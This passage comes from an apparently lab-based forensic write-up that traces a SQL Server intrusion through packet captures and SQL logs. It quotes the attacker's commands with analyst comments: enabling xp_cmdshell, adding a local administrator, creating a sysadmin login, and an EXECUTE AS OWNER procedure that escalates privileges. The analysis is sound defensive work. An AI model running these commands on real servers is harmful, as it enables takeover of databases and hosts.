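in <rsp:Stream Name="stdout|stderr"> chunks (MS-WSMV Receive responses).
"""
import base64
import html
import re
from typing import Dict, List

# One <rsp:CommandLine> block per command sent to the remote shell.
CMDLINE_RE = re.compile(r"<rsp:CommandLine[^>]*>(.*?)</rsp:CommandLine>", re.S)
PART_RE = re.compile(r"<rsp:(Command|Arguments)>(.*?)</rsp:\1>", re.S)
# Output comes back as base64 text, one <rsp:Stream> element per chunk;
# the final chunk is empty and carries End="true".
STREAM_RE = re.compile(
    r'<rsp:Stream\s+Name="(\w+)"[^>]*>([A-Za-z0-9+/=\s]*)</rsp:Stream>', re.S)


def extract_commands(dump: str) -> List[str]:
    """Rebuild each command line as Command + Arguments with XML entities decoded."""
    commands = []
    for block in CMDLINE_RE.findall(dump):
        parts = [html.unescape(text).strip() for _, text in PART_RE.findall(block)]
        commands.append(" ".join(p for p in parts if p))
    return commands


def extract_output(dump: str) -> Dict[str, str]:
    """Concatenate the decoded chunks per stream name (stdout, stderr)."""
    out: Dict[str, str] = {}
    for name, b64 in STREAM_RE.findall(dump):
        b64 = "".join(b64.split())
        if not b64:                      # empty End="true" marker
            continue
        raw = base64.b64decode(b64)
        out[name] = out.get(name, "") + raw.decode("utf-8", errors="replace")
    return out


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed request/response fragments (HTTP headers trimmed), shaped like
# a WinRS command request and its receive response; not from the capture.
CMD_ID = "00000000-0000-0000-0000-000000000001"
SAMPLE_DUMP = (
    "POST /wsman HTTP/1.1\r\nHost: 10.240.240.4:5985\r\n\r\n"
    "<s:Envelope><s:Body>"
    f'<rsp:CommandLine CommandId="{CMD_ID}">'
    "<rsp:Command>powershell</rsp:Command>"
    "<rsp:Arguments>-Command &quot;Invoke-Sqlcmd -ConnectionString $ConnectionString "
    "-Query &apos;SELECT SUSER_SNAME();&apos;&quot;</rsp:Arguments>"
    "</rsp:CommandLine></s:Body></s:Envelope>"
    "HTTP/1.1 200 OK\r\n\r\n"
    "<s:Envelope><s:Body><rsp:ReceiveResponse>"
    f'<rsp:Stream Name="stdout" CommandId="{CMD_ID}">' + _b64("Jerry") + "</rsp:Stream>"
    f'<rsp:Stream Name="stdout" CommandId="{CMD_ID}">' + _b64("SQL\r\n") + "</rsp:Stream>"
    f'<rsp:Stream Name="stderr" CommandId="{CMD_ID}">' + _b64("warning: constructed\r\n")
    + "</rsp:Stream>"
    f'<rsp:Stream Name="stdout" CommandId="{CMD_ID}" End="true"></rsp:Stream>'
    "</rsp:ReceiveResponse></s:Body></s:Envelope>"
)

if __name__ == "__main__":
    for cmd in extract_commands(SAMPLE_DUMP):
        print("command:", cmd)
    for name, text in extract_output(SAMPLE_DUMP).items():
        print(f"{name}: {text!r}")
```

Run it against a real follow-stream dump by reading the file into a string instead of SAMPLE_DUMP; if the response chunks decode to binary rather than text, the session was PowerShell remoting (PSRP fragments) rather than a plain WinRS shell.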
</div><div><br /></div><div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Employees; SELECT IS_SRVROLEMEMBER(sysadmin) as isSysadmin; EXEC Going_Up; SELECT IS_SRVROLEMEMBER(sysadmin) as isSysadmin; USE master; REVERT;</i></div><div>Comment: Still using <i>GeorgeSQL</i>. Checking sysadmin role membership before and after the call, and ultimately switching to the "master" database. <br />What is this "Going_Up"? Fortunately, this was identified during the analysis of the logs from the SQL Server.</div><div>With access to the "<i>master</i>" database, this user now has the keys to the kingdom. Basically full access.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT name AS TableName FROM sys.tables; USE master; REVERT;</i></div><div>Comment: Extract the tables from <i>Seinfeld_Customers</i>, once again switch to "master", then revert to the original user.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = Data; USE master; REVERT;</i></div><div>Comment: Some of the information being requested is similar to what was requested in the previous session, this time using the <i>GeorgeSQL </i>account and also switching to the "master" database.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT * from Data; USE master; REVERT;</i></div><div>Comment: Select all fields from the Data table.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = Secret; USE master; REVERT;</i></div><div>Comment: Grabbing the column information for the table named "Secret". 
</div><div>Considering I did not find information relating to the results returned so far, I'm going to assume this table name was learned from what was returned by some of the previous commands. Previously, there was no attempt to access the table named "Secret". Maybe this is something only visible to those with "sysadmin" permission.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Customers; SELECT * from Secret; USE master; REVERT;</i></div><div>Comment: Grab all information from the "Secret" table. Are there passwords here?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure show advanced options, 1; RECONFIGURE; EXEC sp_configure xp_cmdshell; REVERT;</i></div><div>Comment: "<i>sp_configure</i>" is used to view or change configuration settings on the server. It looks like the attacker is enabling "show advanced options" and then checking the current value of "<i>xp_cmdshell</i>", the setting that ultimately gives access to the Windows command prompt.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure xp_cmdshell, 1; RECONFIGURE; REVERT;</i></div><div>Comment: Not sure why this is run here ...</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure xp_cmdshell; REVERT;</i></div><div>Comment: ... and here. 
I take this to mean it is either testing, or that the actor was not sure what string to pass to the command.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC xp_cmdshell whoami; EXEC xp_cmdshell net user NewUser NewPassword /add &amp;&amp; net localgroup Administrators NewUser /add; REVERT;</i></div><div>Comment: We see a number of commands run via the shell:</div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>"whoami"</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>"net user NewUser NewPassword /add &amp;&amp; net localgroup Administrators NewUser /add"</span></div><div><span style="white-space: normal;"><span style="white-space: pre;"> </span>Create a new user "NewUser" with password "NewPassword" and add the user to the "Administrators" group.</span></div><div><span style="white-space: pre;"> </span></div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; CREATE LOGIN MailManSQL WITH PASSWORD = L4rg3j4mb4l4y4s0up!!!; REVERT;</i></div><div>Comment: Create a login "MailManSQL" with password "L4rg3j4mb4l4y4s0up!!!" on the database server.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_addsrvrolemember MailManSQL, sysadmin; REVERT;</i></div><div>Comment: Add the newly created login "MailManSQL" to the "sysadmin" role.</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query $Query</i></div><div>Comment: Is this meant to clear any historical information in the $Query variable?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; ENABLE TRIGGER MasterOfMySQL ON ALL SERVER; REVERT;</i></div><div>Comment: Enable a database trigger to run on all servers.</div><div>Where was the trigger created? 
Did I miss this?</div><div>At this point, it looks like the trigger does nothing other than run on all servers?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query $Query</i></div><div>Comment: Is this meant to clear any historical information in the $Query variable?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure xp_cmdshell, 0; RECONFIGURE; REVERT;</i></div><div>Comment: Disable the "xp_cmdshell"</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_configure show advanced options, 0; RECONFIGURE; REVERT;</i></div><div>Comment: Turn off the "show advanced options"</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; USE Seinfeld_Employees; DROP PROCEDURE Going_Up; USE master; REVERT;</i></div><div>Comment: I asked above what is this "Going_Up"? I see now it was a stored procedure. However, I don't see any evidence of it being created previously. Maybe an oversight?</div><div><br /></div><div><i>Invoke-Sqlcmd -ConnectionString $ConnectionString -Query EXECUTE AS LOGIN = GeorgeSQL; EXEC sp_dropsrvrolemember GeorgeSQL, sysadmin; REVERT;</i></div><div>Comment: Naughty. 
Removing the GeorgeSQL account from the "sysadmin" role.</div></div><div><br /></div><div><br /></div><div><div>What do we have for the communication(s) between:</div><div>10.240.240.4 <-> 10.240.240.6 </div><div><br /></div><div>Writing this session out to a file.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r packet_capture.pcapng -Y 'ip.addr==10.240.240.4 && ip.addr==10.240.240.6' -w 4-6.pcapng</span>
</pre></div>
</div><div><br /></div><div>Let's look at the protocol hierarchy to see what's there. As you might have noticed, I have done this step quite a few times. It is an important step when doing packet analysis. It should be either the first or the second thing you do once you have received a PCAP.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 4-6.pcapng -q </span><span style="color: #fcff01;"><b>-z io,phs</b></span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:534 bytes:112389</span>
<span style="color: white;"> ip frames:534 bytes:112389</span>
<span style="color: white;"> udp frames:2 bytes:291</span>
<span style="color: white;"> nbns frames:2 bytes:291</span>
<span style="color: white;"> tcp frames:532 bytes:112098</span>
<span style="color: white;"> tds frames:141 bytes:47845</span>
<span style="color: white;"> tcp.segments frames:3 bytes:3716</span>
<span style="color: white;"> _ws.malformed frames:3 bytes:857</span>
<span style="color: white;"> tls frames:91 bytes:34985</span>
<span style="color: white;"> dcerpc frames:16 bytes:4872</span>
<span style="color: white;"> oxid frames:4 bytes:552</span>
<span style="color: white;"> isystemactivator frames:2 bytes:1900</span>
<span style="color: white;"> data frames:64 bytes:3680</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the TCP conversations.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ tshark -n -r 4-6.pcapng -q </span><b><span style="color: #fcff01;">-z conv,tcp</span></b></span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.240.240.4:49685 <-> 10.240.240.6:1433 65 19 kB 90 18 kB 155 37 kB 107.695654000 418.8041</span>
<span style="color: white;">10.240.240.4:49678 <-> 10.240.240.6:1433 51 5,839 bytes 57 11 kB 108 16 kB 26.392676000 480.9564</span>
<span style="color: white;">10.240.240.4:49679 <-> 10.240.240.6:1433 36 2,835 bytes 38 3,416 bytes 74 6,251 bytes 26.411732000 440.0113</span>
<span style="color: white;">10.240.240.4:49675 <-> 10.240.240.6:1433 18 5,774 bytes 31 17 kB 49 23 kB 25.572951000 0.8950</span>
<span style="color: white;">10.240.240.4:49683 <-> 10.240.240.6:1433 23 3,333 bytes 22 5,642 bytes 45 8,975 bytes 27.063125000 0.1133</span>
<span style="color: white;">10.240.240.4:49682 <-> 10.240.240.6:1433 15 2,494 bytes 15 3,900 bytes 30 6,394 bytes 26.936916000 0.1164</span>
<span style="color: white;">10.240.240.4:49676 <-> 10.240.240.6:1433 8 1,566 bytes 10 2,472 bytes 18 4,038 bytes 25.934103000 1.4682</span>
<span style="color: white;">10.240.240.4:49677 <-> 10.240.240.6:1433 7 1,056 bytes 8 1,234 bytes 15 2,290 bytes 26.372522000 0.0392</span>
<span style="color: white;">10.240.240.4:49681 <-> 10.240.240.6:135 6 604 bytes 7 1,876 bytes 13 2,480 bytes 26.480383000 0.0109</span>
<span style="color: white;">10.240.240.4:49684 <-> 10.240.240.6:135 6 604 bytes 7 1,876 bytes 13 2,480 bytes 27.066458000 0.0026</span>
<span style="color: white;">10.240.240.4:49680 <-> 10.240.240.6:135 4 600 bytes 8 632 bytes 12 1,232 bytes 26.475825000 38.3491</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div><div>With 11 sessions, we will analyze these directly rather than writing them out to files. </div><div><br /></div><div>Following the streams for these sessions showed a lot of SQL-related information but did not provide anything I found meaningful to this incident.</div><div><br /></div><div>Here are the commands I ran, as seen in my shell history, looking at the streams from 0 to 10.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> 2047 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,0 | tr --squeeze-repeats '.' | sed 's/"."//g'</span>
<span style="color: white;"> 2049 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,1 | tr --squeeze-repeats '.' | sed 's/\.//g'</span>
<span style="color: white;"> 2050 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,2 | tr --squeeze-repeats '.' | sed 's/\.//g'</span>
<span style="color: white;"> 2052 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,3 | tr --squeeze-repeats '.' | sed 's/\.//g' | more</span>
<span style="color: white;"> 2054 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,4 | tr --squeeze-repeats '.' | sed 's/\.//g' </span>
<span style="color: white;"> 2055 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,5 | tr --squeeze-repeats '.' | sed 's/\.//g' </span>
<span style="color: white;"> 2056 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,6 | tr --squeeze-repeats '.' | sed 's/\.//g' </span>
<span style="color: white;"> 2062 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,7 | tr --squeeze-repeats '.' | sed 's/\.//g' | more</span>
<span style="color: white;"> 2063 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,8 | tr --squeeze-repeats '.' | sed 's/\.//g' | more</span>
<span style="color: white;"> 2065 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,9 | tr --squeeze-repeats '.' | sed 's/\.//g' </span>
<span style="color: white;"> 2067 tshark -n -r 4-6.pcapng -q -z follow,tcp,ascii,10 | tr --squeeze-repeats '.' | sed 's/\.//g' | more</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the character strings of at least 7 bytes did not return anything meaningful.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ strings 4-6.pcapng --bytes=7</span>
</pre></div>
</div><div><br /></div><div><div>Considering the above, I need to get the Unicode data in a more readable manner, so it is better to also search for 16-bit little-endian Unicode strings (<i>--encoding=l</i>). Grepping for a few of the keywords from the earlier analysis still shows nothing meaningful. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ strings 4-6.pcapng --bytes=7 --encoding=l | grep --perl-regexp --ignore-case "jerry|George|Going|xp_cmd"</span>
<span style="color: white;">JerrySQL</span>
<span style="color: white;">.JerryJERRY-PC</span>
<span style="color: white;">.JerryJERRY-PC</span>
</pre></div>
</div><div><br /></div><div><div>What do we have for the communication(s) between 10.240.240.5 <-> 10.240.240.6? Writing the traffic between these IPs out to a file:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r packet_capture.pcapng -Y 'ip.addr==10.240.240.5 && ip.addr==10.240.240.6' -w 5-6.pcapng</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the protocol hierarchy </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-6.pcapng -q </span><span style="color: #fcff01;"><b>-z io,phs</b></span>
<span style="color: white;">===================================================================</span>
<span style="color: white;">Protocol Hierarchy Statistics</span>
<span style="color: white;">Filter: </span>
<span style="color: white;">eth frames:482 bytes:36432</span>
<span style="color: white;"> ip frames:482 bytes:36432</span>
<span style="color: white;"> tcp frames:445 bytes:28091</span>
<span style="color: white;"> data frames:2 bytes:308</span>
<span style="color: white;"> nbss frames:9 bytes:1072</span>
<span style="color: white;"> smb frames:2 bytes:444</span>
<span style="color: white;"> tds frames:3 bytes:295</span>
<span style="color: white;"> dcerpc frames:1 bytes:78</span>
<span style="color: white;"> udp frames:7 bytes:2001</span>
<span style="color: white;"> nbns frames:2 bytes:291</span>
<span style="color: white;"> data frames:5 bytes:1710</span>
<span style="color: white;"> icmp frames:30 bytes:6340</span>
<span style="color: white;"> data frames:5 bytes:1850</span>
<span style="color: white;">===================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the UDP conversations first this time around. </div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ tshark -n -r 5-6.pcapng -q </span><b><span style="color: #fcff01;">-z conv,udp</span></b></span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">UDP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span><span style="color: white;">10.240.240.5:63161 <-> 10.240.240.6:44558 </span><b><span style="color: #fcff01;"> 0 0 bytes</span></b><span style="color: white;"> </span></span><span style="color: #fcff01;"><b> 5 1,710</b></span><span style="color: white;"> bytes 5 1,710 bytes 12.963807000 </span><span style="color: #fcff01;"><b> 9.2074</b></span>
<span style="color: white;">10.240.240.5:137 <-> 10.240.240.6:137 1 199 bytes 1 92 bytes 2 291 bytes 3.316114000 0.0001</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Taking a look at that first session, which lasted 9.2 seconds. This is interesting because all of this traffic is going from 10.240.240.5 on source port 63161 to 10.240.240.6 on destination port 44558, with nothing coming back. </div><div><br /></div><div>If I did not know better, I would say from the output below that this is some type of buffer overflow attempt, as we have 5 groups of this.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">===================================================================</span>
<span style="color: white;">Follow: udp,ascii</span>
<span style="color: white;">Filter: udp.stream eq 1</span>
<span style="color: white;">Node 0: 10.240.240.5:63161</span>
<span style="color: white;">Node 1: 10.240.240.6:44558</span>
<span style="color: white;">300</span>
<span style="color: white;">CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC</span>
<span style="color: white;">....</span>
</pre></div>
</div><div><br /></div><div><div>The thing about UDP is that there is no "<i>RST</i>" or "<i>RST/ACK</i>" to say the service is not available; a closed UDP port is reported, if at all, by an ICMP destination unreachable message (type 3, code 3). </div><div><br /></div><div>Taking a different approach.</div><div><br /></div><div>What are those ICMP messages about? Looking at the types and codes:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ tshark -n -r 5-6.pcapng </span><b><span style="color: #fcff01;">-Y 'icmp'</span></b><span style="color: white;"> -T fields -e icmp.type -e icmp.code -E header=y | sort | uniq --count</span></span>
<span style="color: white;"> 10 0 0</span>
<span style="color: white;"> 5 3,0 2,0</span>
<span style="color: white;"> 5 3 3</span>
<span style="color: white;"> 5 8 0</span>
<span style="color: white;"> 5 8 9</span>
<span style="color: white;"> 1 icmp.type icmp.code</span>
</pre></div>
</div><div><br /></div><div><div>Nothing there that I would like to spend more time on.</div><div><br /></div><div>Looking at a few of these TCP sessions</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ tshark -n -r 5-6.pcapng -q </span><span style="color: #fcff01;"><b>-z conv,tcp</b></span><span style="color: white;"> | head --lines=17 </span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.240.240.5:49688 <-> 10.240.240.6:1433 4 265 bytes 6 412 bytes 10 677 bytes 7.214215000 5.0061</span>
<span style="color: white;">10.240.240.5:63129 <-> 10.240.240.6:135 5 270 bytes 5 370 bytes 10 640 bytes 13.029264000 9.2059</span>
<span style="color: white;">10.240.240.5:63131 <-> 10.240.240.6:135 5 270 bytes 5 370 bytes 10 640 bytes 13.100832000 9.1961</span>
<span style="color: white;">10.240.240.5:63133 <-> 10.240.240.6:7 5 270 bytes 5 370 bytes 10 640 bytes 13.171012000 9.1910</span>
<span style="color: white;">10.240.240.5:63134 <-> 10.240.240.6:7 5 270 bytes 5 370 bytes 10 640 bytes 13.204561000 9.1886</span>
<span style="color: white;">10.240.240.5:49684 <-> 10.240.240.6:135 4 252 bytes 5 468 bytes 9 720 bytes 7.211647000 0.0052</span>
<span style="color: white;">10.240.240.5:49678 <-> 10.240.240.6:135 3 174 bytes 5 332 bytes 8 506 bytes 1.190920000 6.0206</span>
<span style="color: white;">10.240.240.5:49679 <-> 10.240.240.6:139 3 179 bytes 5 318 bytes 8 497 bytes 1.191149000 6.0226</span>
<span style="color: white;">10.240.240.5:49681 <-> 10.240.240.6:1433 3 174 bytes 5 344 bytes 8 518 bytes 1.191463000 6.0224</span>
<span style="color: white;">10.240.240.5:49687 <-> 10.240.240.6:139 3 179 bytes 5 468 bytes 8 647 bytes 7.213755000 0.0037</span>
<span style="color: white;">10.240.240.5:49680 <-> 10.240.240.6:445 2 120 bytes 3 348 bytes 5 468 bytes 1.191310000 6.0177</span>
<span style="color: white;">10.240.240.5:49685 <-> 10.240.240.6:445 2 120 bytes 3 186 bytes 5 306 bytes 7.213397000 0.0024</span>
</pre></div>
</div><div><br /></div><div><div>Reviewing all 60 sessions in this file suggests this is mostly traffic related to some type of SYN scan.</div></div><div><br /></div><div><div><br /></div><div><b><span style="font-size: large;">Log Analysis - SQL Logs</span></b></div></div><div><br /></div><div><div>How many events do we have in this log file?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">$ cat sql_logs.csv | </span><b><span style="color: #fcff01;">wc --lines</span></b></span>
<span style="color: white;">45</span>
</pre></div>
</div><div><br /></div><div><div>During the packet analysis, I did not notice the procedure "<i>Going_Up</i>" being created. I can now see it in the log: its creation, usage and deletion at lines 21, 23 and 41 respectively.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat sql_logs.csv --number | grep --ignore-case --perl-regexp 'going'</span>
<span style="color: white;"> 21 "sql_batch_completed","2023-07-23 19:16:08.3418567","2023-07-23 19:16:08.3418567","0","10215","0","39","93","11","0","0","OK","</span><span style="color: #fcff01;"><b>CREATE PROCEDURE Going_Up</b></span><span style="color: white;"> WITH EXECUTE AS OWNER AS BEGIN DECLARE @SQL NVARCHAR(MAX); SET @SQL = N' EXEC sp_addsrvrolemember ''GeorgeSQL'', ''sysadmin'''; EXEC sp_executesql @SQL; REVERT; END; ","GeorgeSQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","GeorgeSQL","MSSQL-SR","Seinfeld_Employees","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:16:08.4291040"</span>
</pre></div>
</div><div><br /></div><div><div>Comment: This looks like a stored procedure is created that runs under the security context of its owner (<i>WITH EXECUTE AS OWNER</i>). Inside it, the <i>GeorgeSQL </i>account is being added to the "<i>sysadmin</i>" role.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">23 "sql_batch_completed","2023-07-23 19:16:18.3869066","2023-07-23 19:16:18.3869066","0","12751","0","29","375","3","0","10","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; USE Seinfeld_Employees; SELECT IS_SRVROLEMEMBER('sysadmin') as isSysadmin; EXEC Going_Up; SELECT IS_SRVROLEMEMBER('sysadmin') as isSysadmin; USE master; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:16:18.5402140"</span>
</pre></div>
